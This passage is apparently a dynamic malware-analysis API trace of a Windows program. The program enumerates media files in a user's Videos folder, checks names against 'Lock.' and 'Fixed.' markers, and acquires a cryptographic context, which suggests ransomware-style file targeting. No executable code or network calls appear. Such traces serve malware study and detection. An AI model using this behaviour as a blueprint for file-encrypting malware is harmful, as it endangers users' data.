wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x57202740, ftCreationTime.dwHighDateTime=0x1d5ccf0, ftLastAccessTime.dwLowDateTime=0x3e85ef50, ftLastAccessTime.dwHighDateTime=0x1d5d1ad, ftLastWriteTime.dwLowDateTime=0x3e85ef50, ftLastWriteTime.dwHighDateTime=0x1d5d1ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="PkICTcvFSPf3s9J", cAlternateFileName="PKICTC~1")) returned 1 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239cade0, ftCreationTime.dwHighDateTime=0x1d5cdd0, ftLastAccessTime.dwLowDateTime=0xc7c16330, ftLastAccessTime.dwHighDateTime=0x1d5d289, ftLastWriteTime.dwLowDateTime=0xc7c16330, ftLastWriteTime.dwHighDateTime=0x1d5d289, nFileSizeHigh=0x0, nFileSizeLow=0x12697, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="qt2pH0rRBDAlo9_9_.avi", cAlternateFileName="QT2PH0~1.AVI")) returned 1 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7417b320, ftCreationTime.dwHighDateTime=0x1d5cad6, ftLastAccessTime.dwLowDateTime=0x758ee910, ftLastAccessTime.dwHighDateTime=0x1d5d406, ftLastWriteTime.dwLowDateTime=0x758ee910, ftLastWriteTime.dwHighDateTime=0x1d5d406, nFileSizeHigh=0x0, nFileSizeLow=0xeca2, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="RV_dV0DIDgvgK.avi", cAlternateFileName="RV_DV0~1.AVI")) returned 1 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62ccc210, ftCreationTime.dwHighDateTime=0x1d5d08d, ftLastAccessTime.dwLowDateTime=0xe5493b90, ftLastAccessTime.dwHighDateTime=0x1d5c9f5, ftLastWriteTime.dwLowDateTime=0xe5493b90, ftLastWriteTime.dwHighDateTime=0x1d5c9f5, nFileSizeHigh=0x0, nFileSizeLow=0x17996, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="sDbATpZQ6r.swf", cAlternateFileName="SDBATP~1.SWF")) returned 1 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdff5f6d0, ftCreationTime.dwHighDateTime=0x1d5c7be, ftLastAccessTime.dwLowDateTime=0xa0e93160, ftLastAccessTime.dwHighDateTime=0x1d5d19f, ftLastWriteTime.dwLowDateTime=0xa0e93160, ftLastWriteTime.dwHighDateTime=0x1d5d19f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="SpSJ7tN62PCD2h Y", cAlternateFileName="SPSJ7T~1")) returned 1 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79739500, ftCreationTime.dwHighDateTime=0x1d5d350, ftLastAccessTime.dwLowDateTime=0xd8434120, ftLastAccessTime.dwHighDateTime=0x1d5d594, ftLastWriteTime.dwLowDateTime=0xd8434120, ftLastWriteTime.dwHighDateTime=0x1d5d594, nFileSizeHigh=0x0, nFileSizeLow=0x366f, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="SuK1W_b3QKmuHjRF.swf", cAlternateFileName="SUK1W_~1.SWF")) returned 1 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.188] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf32fd840, ftCreationTime.dwHighDateTime=0x1d5cc1b, ftLastAccessTime.dwLowDateTime=0x9ccacc80, ftLastAccessTime.dwHighDateTime=0x1d5c7fc, ftLastWriteTime.dwLowDateTime=0x9ccacc80, ftLastWriteTime.dwHighDateTime=0x1d5c7fc, nFileSizeHigh=0x0, nFileSizeLow=0xbb15, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="vMM vqaD0kHJ4F.mp4", cAlternateFileName="VMMVQA~1.MP4")) returned 1 [0212.189] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd98edae0, ftCreationTime.dwHighDateTime=0x1d5ceb8, ftLastAccessTime.dwLowDateTime=0x6325c920, ftLastAccessTime.dwHighDateTime=0x1d5cf7d, ftLastWriteTime.dwLowDateTime=0x6325c920, ftLastWriteTime.dwHighDateTime=0x1d5cf7d, nFileSizeHigh=0x0, nFileSizeLow=0x5b7d, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="X3KII9Ky2zq5leE1M.mkv", cAlternateFileName="X3KII9~1.MKV")) returned 1 [0212.189] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2af0000, ftCreationTime.dwHighDateTime=0x8cf2b0, ftLastAccessTime.dwLowDateTime=0x2af0000, ftLastAccessTime.dwHighDateTime=0x18, ftLastWriteTime.dwLowDateTime=0x3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Ƙʦ桰ʪⷾ瞉", cAlternateFileName="踚@鐔ʯ\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0212.189] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.189] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0212.190] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.190] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.190] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.190] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.190] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A5YVihV.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5YVihV.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YVihV.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VihV.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ihV.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hV.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.191] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A5YVihV.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5YVihV.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YVihV.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VihV.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ihV.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hV.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.191] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.191] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0212.191] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.191] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.191] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.191] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.191] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0212.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.192] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/A5YVihV.avi", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdabc6600, ftCreationTime.dwHighDateTime=0x1d5d569, ftLastAccessTime.dwLowDateTime=0x9a905450, ftLastAccessTime.dwHighDateTime=0x1d5d259, ftLastWriteTime.dwLowDateTime=0x9a905450, ftLastWriteTime.dwHighDateTime=0x1d5d259, nFileSizeHigh=0x0, nFileSizeLow=0x1d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="A5YVihV.avi", cAlternateFileName="")) returned 0x9e2078 [0212.192] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0212.192] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.192] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.192] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.192] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.192] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.192] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.192] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.192] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.192] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.192] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.192] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.192] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.192] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.193] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.193] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.193] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0212.193] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.193] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0212.193] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.193] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.193] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.193] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.193] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.193] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.193] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0212.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0212.193] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.193] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.193] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.193] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.193] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.193] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.193] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0212.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0212.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7020, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0212.194] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c770) returned 1 [0212.194] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.194] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.195] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0212.195] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.195] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0212.195] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.195] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, 